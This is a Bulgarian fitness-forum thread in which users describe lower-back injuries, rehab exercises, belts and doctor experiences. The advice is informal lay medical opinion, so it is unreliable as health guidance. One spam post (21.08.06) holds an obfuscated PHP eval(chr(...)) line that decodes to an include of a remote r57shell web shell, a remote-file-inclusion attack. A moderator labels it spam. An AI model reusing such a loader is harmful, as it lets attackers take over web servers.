Проблеми с кръста

Прескочи до:

11.09.05
14:11

ами да ви кажа, след очевидно мн силна настинка, нервът ми се е възпалил и вече 4 месец не е спрял да ме боли кръст! Мазах се 1 с фастмугел, после с по-ефективния ревулзан маз, дори с тайландко чудо за по-бързо попиване, но ефекта е временен.. напоследък дори нямам  и време за тренки, защотото имам мн да уча и затова и ми е чудно, че въпреки че не съм трениала от 1 месец болката си е на все същотото равнище :( ..бях на ехограф, но не показа изменения, и рентгеновата снимка също. Бил проблем на меката тъкан.

28.09.05
00:23

offtopic:
пиши на кирилица в България сме и сме българи в края на краищата
[quote author=“martinello”]Zagrqvaite be Hora…. ako ne iskate travmi….

Ами не е само това въпреки че е много важно. В сремежа си да качим повече кила на щангата забравяме за правилната форма и 80 % от случаите това е главната причина за контузия

HR

13.12.05
22:24

Някой има ли идея за болката дето ми се появи преди 2-3 дена - много ниско в кръста, направо при опашната кост? Появи се след ден с клек, мисля, и се влоши лед деня с тягата....боли ме при различни движения, но винаги при навеждане. Болката е рязка за момент, не убийствена, но силна.....

от два месеца пък имам друга болка под дясната плешка, но е като мускулна болка. Ходих при един от ония доктори дето ти наместват гръбнака....не се сещам точно какви специалисти са. Прави ми снимка, казва че имам разни гръбначни изкривявания, но кой ги няма??....та иска да ме лекува 6 седмици да съм ходел да ми намества прешлените и не знам си кво..какво мислите?.....дали изкривяването има общо с новопоявилата се болка на опашната кост, и тези доктори дали са шашми? Вземе да му счупи гръбнака или нещо :o

Мерси

AN

14.12.05
00:58

[quote author=“HomeBoy Recz”]Някой има ли идея за болката дето ми се появи преди 2-3 дена - много ниско в кръста, направо при опашната кост? Появи се след ден с клек, мисля, и се влоши лед деня с тягата....боли ме при различни движения, но винаги при навеждане. Болката е рязка за момент, не убийствена, но силна.....

от два месеца пък имам друга болка под дясната плешка, но е като мускулна болка. Ходих при един от ония доктори дето ти наместват гръбнака....не се сещам точно какви специалисти са. Прави ми снимка, казва че имам разни гръбначни изкривявания, но кой ги няма??....та иска да ме лекува 6 седмици да съм ходел да ми намества прешлените и не знам си кво..какво мислите?.....дали изкривяването има общо с новопоявилата се болка на опашната кост, и тези доктори дали са шашми? Вземе да му счупи гръбнака или нещо :o

Мерси

Много внимавай с тези доктори, защото може да стане пъти по-зле. Недей да почваш лечение без да са те прегледали няколко независими доктора, щото много често си противоречат напълно един на друг. Не е лоша идея да те прегледат на ехограф. Говоря ти ги тези работи, защото майка ми има много проблеми с кръста и вече няма лекар който да не е посетила и всичките казват различни неща

HR

14.12.05
16:56

[quote author=“Animal”][quote author=“HomeBoy Recz”]Някой има ли идея за болката дето ми се появи преди 2-3 дена - много ниско в кръста, направо при опашната кост? Появи се след ден с клек, мисля, и се влоши лед деня с тягата....боли ме при различни движения, но винаги при навеждане. Болката е рязка за момент, не убийствена, но силна.....

Мерси

Много внимавай с тези доктори, защото може да стане пъти по-зле. Недей да почваш лечение без да са те прегледали няколко независими доктора, щото много често си противоречат напълно един на друг. Не е лоша идея да те прегледат на ехограф. Говоря ти ги тези работи, защото майка ми има много проблеми с кръста и вече няма лекар който да не е посетила и всичките казват различни неща

Мммдаааа, и аз имам лошо мнение за докторите....всеки ти казва различно....офффф не знам, ще продължавам да събирам инфо
Поздрави

PE

14.01.06
13:08

Здравите!
Искаше ми се да се жключа в та эи тепь тъи като аз сущо имам проблеми с кръста.Преди около 3 месеца получих болки в кръста.На една тринировка за крака залитнах напред с щангата и от тогава до сега все ме наболява.След контузията починах малко но болката не отмина и реших да отода при GP-то си.Тои естествено нищо съществено не ми каза “Ще почивш повече и ще пиеш всяка сутрин по чаша прясно мляко”.Аз естествено не го послушах и си взех Llexodon A (съдържа глюкоэамин и хондоритин).Сега болка усещам само при голямо натоварване която бърэо отминавал.
Е дотук эа мен сега да ви разкажа на барзо за един мои роднина.Тои е на около 39 и се занимаваше дълго време сас щанги.Та преди 3 мес. получи дискова херния при настинка беше го страх да се уперира и тругна по разни”доктори” дета та дърпат,пукат,трошат и незна си още кво.Отиди в Павелбаня и там тия “професионалисти” не знам какво са го правили ама му изкривиха гръбнака и единият му крак укася с 5 сантиметра!!!И туи ша си и остане.
Та искам да ви кажа да внимавате с тия “доктори” ,че да не съжалявате после цял живот.
И умната с килограмита на щангата!

19.02.06
15:58

И аз май не оставам по назад с тоя кръст :cry:
При мен нещата започнаха с болка в една единствена точка на кръста, след което болката слизаше към крака. Ходих на лекар и ми казаха, че най-вероятно имам някакви микроразкъсваня и засега няма да ме пращат на снимка. Пия Neurobex и Diclofenal и се мажа с Deep Relief. Мисля, че си направих проблема с тяга и клек и колкото и да неискам съм дотук с тези движения. Направих грешка като правих тяга от допълнителна височина. Изключвам слаба преса и недобра здравина на гръбната мускулатура.
Интересува ме някой използва ли тези колани с пластини и ластици по време на тренирока? Сериозно се замислям за в бъдеще да си взема такъв колан, когато възтановя отново тренировките.

19.02.06
16:57

За такива колани с пластини и ластици не съм чувал,но колан почти(ако не) всеки ползва.Имам  в предвид обикновен,кожен колан,който е широк отзад и се слага на кръста при тяга,клек и тнт.Задължително ползвай колан,за да се предпазиш от херния и други контузии.Може да не го ползваш само в загряващте серии.

19.02.06
19:33

Знам за какво ми говориш, но аз клек и тяга винаги съм избягвала да правя по по- малко от 10 повторения и при пирамида дори нарочно не съм ги включвала като движения. Аз говоря за едни медицински колани, които са с ластици и изолират кръста. Имат и пластини, които незнам от какво са направени. Тези колани са точно за такъв тип травми.

Аз имам такъв колан. Моят струва около 60 лв. и има 6 метални, вертикално разположени пластини.Самите пластини са от ламарина (не се виждат , но наподобяват на уголемени дъвки-ленти). При употреба коланът обхваща областта между 11-12-то ребро и началото на тазовата кост. Идеята е да се изолират всички мускули, в областта на лумбалните прешлени. С други думи можеш да се наведеш единствено чрез свиване на колянната става.
Не мисля,че коланът може да се използва при тренировки, освен ако не е с някакви много леки тежести.
Успех!:)

23.02.06
12:09

Ясно благодаря. Аз си мислех да се използва за стабилизиране при упражнения примерно от стоеж.

11.03.06
12:39

Охо, обсъждате единствения проблем който ме плаши стабилно :|
Какво мога да кажа...преди 2-3 год. започна всичко...започна да ме наболява кръста(областа над дупето, дето е сгъвката), не обърнах внимание и не беше кой знае каква болка, само веднъж на 2 месеца ме тормози някоя нощ и не мога да спя от болки. Но през останалото време не усещам болка. Болеше ме само когато бях пред компютъра. Та, мисълта ми е, че тая болка общо взето идва от дългото стоене пред компютъра, незнам дали е неправилната стойка или течението което ми “блъска” гърба...никога не съм правил мъртва тяга, чукове и т.н., единственото което си позволявам(което засяга кръста) е гребане с дъмбел, и гледам да го правя максимално правилно.
Някой да има информация дали хиперекстензията “размеква” кръста, в смисъл да го прави по уязвим към травми...ест хиперекстензията я правя като последно упражнение. А съм само на 16(правя 17 на 21 април). Значи повечето ще ми препоръчате да отида при лечния лекар, така ли ?
Edit: Сега ме боли докато карам на велоергометъра, чак ми е гадно да седя , едвам издържам 25-30 мин :( :( :( . Болката е малка но стабилна и плашеща...

01.04.06
18:26

Да му се не види прочетох цялата смотана тема и това дето разбрах беше “внимавайте” и “ходете на доктор” или “не ходете на доктори” и за малко да се разплача като научих колко хора просто искат да си споделят проблемите без да кажат нещо смислено - щом някой пише тука или чете ясно е че има някакви проблеми с кръста.

Та искам да попитам някой знае ли някакви упражнения, които да се правят така да се каже за “профилактика” на кръста - не говоря примерно за тяга и гръбни преси, а за такива, който помагат при болка(както има и упражнения за дустабанлийте).

Другото - при по продължително седене ме боли кръста. Някой да има идея дали това зависи от стойката, дали седя на твърд стол или мек диван или ако не е от тези неща въобще има ли нещо общо.

08.06.06
00:38

Здравейте,
много добра тема!!! От няколко седмици и аз съм в този клуб - на хората с проблеми в кръста. Преди 3 седмици при мъртва тяга усетих леко напрежение в долната част на кръста. Правех на 100 дестки в стиктна форма, но за съжеление реших, че ми е леко и мога да се изпъчвам в горната част на движението и предполагам вече се сещате какво се случи. Напрежението се появи към 5-то повторение, но аз разбира се реших да довърша серята. Повече нито болка нито напрежение имаше и затова реших да разтегна с 3 серии хиперекстензии и може би това ме е довършило. На следващата сутрин не можех да стана от леглото !!! Просто страшна болка в кръста дори само при сядане в леглото за ставане и дума не можеше да става. След 4 дни можех да се движа леко. Сега 17 дни след случката сам по-добре но все още не мога да се навеждам и да ходя правилно. Имам час за ядрено-магнитен резонанс но е за след 3 седмици. Аз мисля да изчакам още 5 дни и да започна да тренирам само изолирани упражнения които не натоварват кръста. Ако някой има идея какво може да е нека ми пише.

Поздрави и благодаря

20.06.06
23:52

Аз си преебах кръста като бях на 15 или на 16г. сега съм на 26г. , та тогава тъкмо бях почнал да правя клек бях в една зала за щангисти и почнах с малки тежасти разбирасе и си тренирах така леко се пак тогава бях под 60кг, и си правех клекове с 40, 50кг, но един ден треньорът на щангистите дойде при мен и ми каза 4е клякъм хубаво да съм сложел 100кг и да клякам с тях, сложих аз 100, и кво става оня както беше до мен се оказва изведнъж че на второто повторение при мен няма никои, и щангата ме захлупи напред  и се истърколи през всичките ми прешлени, направо ми испука сичко, 3- месеца бях като патрав само да мръднех по рязко и болка, после същия треньор ми каза че за да нямам проблеми с кръста трябва да си заздравя корема, И това наистина помогна не съм тренирал много корем но наистина се оправих, на 6-тия месец вече нямах никаква болка, и постепенно започнах пак да си клякам и да си правя тяга. Извода е следния, винаги правете тези клек с помошник, винаги загряваите постепенно, като дори и 4 загряваши серии не са излишни, заздравете коремната стена дизбаланса в мускулите корем-гръб довежда до често срещаните прищипвания. Ако правите упражнението в неправилна форма веднага спрете и намалете тежаста.

B_

22.06.06
22:24

здравейте ... днес ми казаха, че имам дискова херния  :cry:  :cry:  та въпроса ми е има ли още потребирели тук с този проблем и как тренират ... кои упражнения може да се правят и кои неможе???
Мерси предварително

22.06.06
23:36

[quote author=“B_Ball_P”]здравейте ... днес ми казаха, че имам дискова херния  :cry:  :cry:  та въпроса ми е има ли още потребирели тук с този проблем и как тренират ... кои упражнения може да се правят и кои неможе???
Мерси предварително

Киборга има дискова херния , каза че не прави гребане с щанги и МТ , само на скрипци работи за гръб

09.08.06
16:22

[quote author=“Cherniq_Konan”]Да му се не види прочетох цялата смотана тема и това дето разбрах беше “внимавайте” и “ходете на доктор” или “не ходете на доктори” и за малко да се разплача като научих колко хора просто искат да си споделят проблемите без да кажат нещо смислено - щом някой пише тука или чете ясно е че има някакви проблеми с кръста.

Та искам да попитам някой знае ли някакви упражнения, които да се правят така да се каже за “профилактика” на кръста - не говоря примерно за тяга и гръбни преси, а за такива, който помагат при болка(както има и упражнения за дустабанлийте).

Другото - при по продължително седене ме боли кръста. Някой да има идея дали това зависи от стойката, дали седя на твърд стол или мек диван или ако не е от тези неща въобще има ли нещо общо.

Здрасти!Малко съм закъсняла с включването, но чак сега мернах темата. Гаджето ми имаше сериозни проблеми с кръста, докарани от игра на тенис. Оказа се протрузия (дискова херния в някакъв стадий или нещо от сорта). Повече от седмица беше на легло и единственото, което му предписаха бяха разни обезболяващи хапчета, кремове и ЕЖЕДНЕВНИ УПРАЖНЕНИЯ за кръста. Сега всяка сутрин прави едни такива “бабешки” упражнения, като например:1. ляга по гръб на земята със събрани крака и ръце, изпънати над главата, след което протяга/опъва лява ръка и ляв крак, задържа няколко секунди и после повтаря с дясна ръка и десен крак - една серия, 10 повторения;
2. застава на “четири крака” и се извива в гръбнака (”котешко гръбче”).Пак задържа, отпуска и така - десетина пъти; 3. лежейки по гръб, без да вдига крака и да отлепя кръста от земята, просто повдига таза малко (като за едно леееко неприлично движение със сексуален подтекст;) и отпуска; 4. коремни преси, като повдига единствено горната част на торса, само раменете, без изобщо да отлепя кръста от земята. Това е най-общо, дано съм разбрала правилно какво те интересува и да съм обяснила упражненията добре. Има съответна книжка с тях, чието заглавие и автор, ако те интересува, мога проверя. Колкото и абсурдни да изглеждат, идеята била да се развият малките мускулчета около гръбнака, които при по сериозни упражнения не натоварваш, защото тогава се включвали големите мускули и мъничките оставали изолирани и недоразвити.А те били също много важни за поддържане на гръбнака и предпазване на кръста.
Що се отнася до втория ти въпрос - начинът на седене е едно от най-важните неща и основна причина за дискова херния при повечето хора (особено нетрениращи и водещи застоял живот). Адски важно е да стоиш правилно - с изправен гръб, дупето - до облегалката на стола, която пък следва да е достатъчно удобна и да ти поддържа кръста. Гаджето ми си купи специален стол по тази причина, защото по 8-9 часа седи пред компютър. Абсолютно забранено е да стоиш изсулен на стола и се оказва важно и да внимаваш много дори при елементарни движения, като обуване на обувките, например. Никаво навеждане от кръста, докато си прав, за да си завържеш връзките. Сядай.
Иначе приятелят ми продължава да си ходи на фитнес, кара ски, но вече избягва сноуборда, защото усукващото движение при неговото каране било много вредно за кръста (пък той доста се наплаши). Кара и уиндсърф, но пак(както и при фитнеса) непрестанно мисли и внимава дали натоварва прекалено кръста. А иначе казват, че веднъж получиш ли такава травма, оправия цялостна няма, само пазене му е майката.
Това е. Дано не съм отегчила всички ви, ама...за добро беше:))

13.08.06
06:49

АДСКИ много ти благодаря. Точно тея работи ме интересуваха. Мерси.

13.08.06
09:40

Хич не са бабвшки тия упражнение и си върпат перфектна работа. Идеята е да се загрее човек от сутринта с леки натоварвания, които не водят до микроконтузии.

Идеята е да се правят с постоянство и за 3 месеца всяка сутрин ще усетиш сериозен резултат.

На мен да чукна на дърво ми няма нищо сериозно, обаче и аз мисля да почна да ги правя. Проблема е, че сутрин съм все като на 2 ракии и ме мързи да си отворя очите, камоли да се метна да тренирам... 

Ама ще трябва да се захвана. В същност най-доброто е да се прави съмвзем нежна виз зарядка в комунистически стил.

16.08.06
12:53

2. застава на “четири крака” и се извива в гръбнака (”котешко гръбче”).Пак задържа, отпуска и така - десетина пъти

Само за това да те питам - гръбнака нагоре ли се извива(като дъга) или обратно?

21.08.06
21:44

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Спам
ASTOR

21.08.06
21:47

test

Още един спам и тека ще те изтествам че няма да можеш да влизаш повече !!!!
ASTOR

DY

05.12.06
00:58

Струва ми се добра идея тук да посочите най-рисковите за кръста упражнения и евентуално нерисков “заместник” за всяко от тях, ако знаете такъв. Мисля че този списък ще е много полезен.

05.12.06
14:41

Не би било лошо, стига да беше възможно. С какво например ще замениш тягата? Или клека? За второто може на хакен машина ако има такава, ама не е същото, не се налага да балансираш да кажем.
Другите рискови според мен са всички разновидности на гребането (щанга, дъмбел, Т-щанга), раменните преси ако се правят прав и за мен коремните преси.
Но най-рисковото е скапаната техника. Ако се кривиш и кълчиш, особено с непосилни ти тежести какво да очакваш..

FI

05.12.06
14:56

[quote author=“Dymag”]Струва ми се добра идея тук да посочите най-рисковите за кръста упражнения и евентуално нерисков “заместник” за всяко от тях, ако знаете такъв. Мисля че този списък ще е много полезен.

На мен хиперекстензиите ми се стуват доста рискови, но въпреки това ги правя, само дето гледам да внимавам. :roll:

05.12.06
19:03

В началото ако не внимаваш може да се контузиш (както с всичко, не само с фитнеса). После имат добър ефект - тренрат ти точно мускулите около кръста и е по-трудно да се прецака нещо.

12.12.06
21:52

Имам известни проблеми с кръстта,но не са породени от фитнес(и аз незнам точно от какво-може би от по-слаба мускулатура).Ходих на лекар и тои ми препоръча ако го натоварвам(кръстта си) на работа да си купя специален подсилен(с шини отзад) колан.И аз си купих-дадох 100лв.(само да има ефект).Само че като чета тука във форума(пък и от др. места) научавам,че ако го нося постоянно мускулите на кръстта ми могат да атрофират(да го изнежа).Затова искам до го заздравя с някакви ефикасни упранения.Тук четох за едни упражнения-цитирам:
. “Сега всяка сутрин прави едни такива “бабешки” упражнения, като например:1. ляга по гръб на земята със събрани крака и ръце, изпънати над главата, след което протяга/опъва лява ръка и ляв крак, задържа няколко секунди и после повтаря с дясна ръка и десен крак - една серия, 10 повторения;
2. застава на “четири крака” и се извива в гръбнака (”котешко гръбче”).Пак задържа, отпуска и така - десетина пъти; 3. лежейки по гръб, без да вдига крака и да отлепя кръста от земята, просто повдига таза малко (като за едно леееко неприлично движение със сексуален подтекст и отпуска; 4. коремни преси, като повдига единствено горната част на торса, само раменете, без изобщо да отлепя кръста от земята. Това е най-общо, дано съм разбрала правилно какво те интересува и да съм обяснила упражненията добре. Има съответна книжка с тях, чието заглавие и автор, ако те интересува, мога проверя. “
Интересува ме откъде мога да си намеря тази книжka;както и по отношение
на 1-то описано упражнение-по гръб или по корем трябва да лежа,както и по колко серии се изпълняват?[/url][/list]

14.12.06
12:46

Книгата и това упражнение не ги знам, но за заздравяване на кръста мога да ти препоръчам “добро утро” и “хиперекстензии”. За начало внимателно, по-малко повторения, особено щом ти е слаб кръста. И се запаси с търпение, ефект след 2 месеца труд поне.
Упражненията (тея двете) мисля, че ги имаше на сайта.
Относно оня подсилващ колан - ако работиш тежък труд може и да има полза от него. Но наистина постоянната му употреба не мисля, че ще доведе до нещо добро. По-скоро ако ще има голямо натоварване, тогава го слагай, все пак да пазиш от контузия, иначе при нормална ситуация без него по-добре.

П.П.: поздравявам те, задето първо си потърсил из форума, а чак после си попитал

DY

14.12.06
22:53

Brus73, както и всеки друг с неопределен източник на проблем. Редно е да разбереш причината за проблема. Може да е от неудобно положение докато работиш в местоработата или дори неудобен стол. Имам познат, който си докара дископатия от чертежи - беше чертожник някакъв и работеше прав и наведен над плота с часове. Чувал съм за ... плексит май беше (болката е високо между плешките), докаран от два дена мазане с латекс на таван, което изисква непрекъснато да гледаш нагоре.  Може и да е от много мека пружина на леглото в което спиш - сложи си дъски или матрак. Може у да е от течение, на което се излагаш ежедневно. Знам ли, то упражненията ще помогнат, но потърси внимателно и за евентуална причина. Може и да не е слаби мускули, а нещо много банално, което при всички положения трябва да се прекрати или премахне.

18.12.06
19:13

[quote author=“Dymag”]Brus73, както и всеки друг с неопределен източник на проблем. Редно е да разбереш причината за проблема. Може да е от неудобно положение докато работиш в местоработата или дори неудобен стол. Имам познат, който си докара дископатия от чертежи - беше чертожник някакъв и работеше прав и наведен над плота с часове. Чувал съм за ... плексит май беше (болката е високо между плешките), докаран от два дена мазане с латекс на таван, което изисква непрекъснато да гледаш нагоре.  Може и да е от много мека пружина на леглото в което спиш - сложи си дъски или матрак. Може у да е от течение, на което се излагаш ежедневно. Знам ли, то упражненията ще помогнат, но потърси внимателно и за евентуална причина. Може и да не е слаби мускули, а нещо много банално, което при всички положения трябва да се прекрати или премахне.

благодаря!
може с да имаш право-матрака ми е малко изтърбушен и вече си търся нов(дано това да реши проблема)

18.12.06
19:16

[quote author=“marzipan”]Книгата и това упражнение не ги знам, но за заздравяване на кръста мога да ти препоръчам “добро утро” и “хиперекстензии”. За начало внимателно, по-малко повторения, особено щом ти е слаб кръста. И се запаси с търпение, ефект след 2 месеца труд поне.
Упражненията (тея двете) мисля, че ги имаше на сайта.
Относно оня подсилващ колан - ако работиш тежък труд може и да има полза от него. Но наистина постоянната му употреба не мисля, че ще доведе до нещо добро. По-скоро ако ще има голямо натоварване, тогава го слагай, все пак да пазиш от контузия, иначе при нормална ситуация без него по-добре.

П.П.: поздравявам те, задето първо си потърсил из форума, а чак после си попитал

тези упражнения не ги знам-за културисти ли са(аз правя си 1-ни от иога)

19.12.06
20:50

Ами...да, предполагам...Но хиперекстензиите може да се равят и със собствено тегло само (рядко съм виждал някой, гушнал тежест за тях). От друга страна се правят пък на специална пейка, а доколкото знам в йога се ползва едно килимче най-много..
Не знам доколко ти отговорих на въпроса, най-вече защото не го разбрах съвсем.
А ако не ги знаеш провери ги ;)

25.12.06
14:13

[quote author=“marzipan”]Ами...да, предполагам...Но хиперекстензиите може да се равят и със собствено тегло само (рядко съм виждал някой, гушнал тежест за тях). От друга страна се правят пък на специална пейка, а доколкото знам в йога се ползва едно килимче най-много..
Не знам доколко ти отговорих на въпроса, най-вече защото не го разбрах съвсем.
А ако не ги знаеш провери ги ;)

А къде са описани тези упражнения как се правят(”добро утро” и “хиперекстензии”).Проверявах,но всеки само ги цитира без да пояснява как се изпълняват.

CE

02.01.07
19:38

Хиперекстензии - http://www.bb-team.org/exercise/000053.php

Иначе по-темата: И аз имах в началото сериозни болки в кръста, даже почти се отказах. Обаче след  2-3 месеца почивка болката премина сама и чух от някъде, че трябва да вкарам яко корем и хиперекстензии, само че напълно правилно изпълнение. Така и направих и сега вече мога да се похваля със ‘железен’ кръст. Не съм имал проблеми от тогава.  :D

02.01.07
20:36

[quote author=“Ceko^”]Хиперекстензии - http://www.bb-team.org/exercise/000053.php

Иначе по-темата: И аз имах в началото сериозни болки в кръста, даже почти се отказах. Обаче след  2-3 месеца почивка болката премина сама и чух от някъде, че трябва да вкарам яко корем и хиперекстензии, само че напълно правилно изпълнение. Така и направих и сега вече мога да се похваля със ‘железен’ кръст. Не съм имал проблеми от тогава.  :D

благодаря-а за корем,коремни преси ли правиш?

17.01.07
22:03

През 92ра при хвърляне на медицинска топка в училище се сецнах и оттогава до сега кръста винаги ме е болял непрекъснато. Военните лекари ми писаха, че имам дископатия лумбалис, но от казарма не ме освободиха - не знам, колко е сериозно, освен това имам и спина бифида.
Лицеви опори, коремни преси, возене в градския транспорт, продължително време стоене прав предизвикваха големи болки и вкочаняване на кръста.
Миналото лято почнах да правя хиперекстензии и после тяга - първо само с лоста, после с 30 кг, с 40 кг, вече съм на 50 (при собствено тегло 75кг) и дори 55кг, започнах по-късно да правя и коремни преси от голям наклон, но никога повече от 10 в серия - бих казал, че вече кръста не ме боли! Случва се разбира се да ме заболи, но не от тренировката и то сравнително рядко - предимно от продължително време стоене прав или седнал в неподходяща поза.

Мъртва тяга знам, че може да се прави с много големи тежести, но в една книга четох, че за избягване на контузии за такива като мен е препоръчително да правят тягата с тежест равна на собственото им тегло.

Иначе корема го тренирам предимно с вдигане на крака от висилка - от това кръст и гръб не болят.

23.02.07
02:17

аз имам изместен прешлен на кръста в следствие скок от височина 2 метра без да си свия краката достатачно добре... т.е. забих се като пирон :)
това стана когато бях малък но и до сега си ме боли кръста като правя коремни преси или когато вдигам краката за “долен корем”.
има обаче един момент в който болката отшумява - след правене на “долен гръб” т.е. когато тренирам мускулите в долната част на гърба те поемат по-ефективно тежеста на тялото и така помагат на изместения прешлен. Реално гърба не ме боли въобще след тренировка (освен ако не вдигна нещо тежко разбирасе)
та съвета ми към хората с проблеми в кръста е да пробват с точно това упражнение - нещо като “обратна” коремна преса мисля че се казваше хиперекстензия. В повечето зали си има специален уред за това :)

06.04.07
10:39

Здравейте на всички!
Темата наистина е хубава.Аз се занимавам сьс спорт от 15 години,в момента сьм на 20.Преди няколко години получих травма на крьста,от лошо падане на паркет.Пьрвите дни след контузията ми се случваше докато ходя,така да ме заболи крьста,че да не мога да се дивжа.Спирам на улицата и чакам да ми мине,много силна болко изпитвах.Не отидох на лекар,това може би беше голяма грешка от моя страна.И така с течение на времето болката отшумя.Но и до сега,например когато седя продьлжително време,стана ли почва да ми пука крьста.Сьщо,когато го загрявам чувствам лека болка придружена с изпукване.Мазах се с разни боклуци не дадоха никакьв резултат.Нерв ли сьм засегнал...знам ли?
Поздрави!

XA

26.04.07
14:50

Братлета ходя на фитнес вече 3 година.Понякога ме болеше кръста но не обръщах внимание.Та преди седмица ходих на преглед и ми откриха 2 смачкани прешлена.Направо изпаднах в шок как е станало това нещо при положение че не ме е болял кръста от доста време.:( Та ми предстои още един преглед от който ще разбере ще мога ли да стъпя отново в залата :(

Прескочи до:
back-arrowbb-hexcalendarcheckoutfacebook-iconforumgoogle+instagramlinkedinlogo-smallmailmessagesmy-bbprofileprogressreadingsearchseparator-carrotseparator-dumbbellseparator-shoeservicestoresubmit-arrowtop-arrowtwitteryoutube1 forum-blockforum-deleteforum-editforum-favorite-postforum-flagforum-followforum-lockforum-mergeforum-moveforum-new-postforum-quoteforum-recommendforum-subscribeforum-unlock1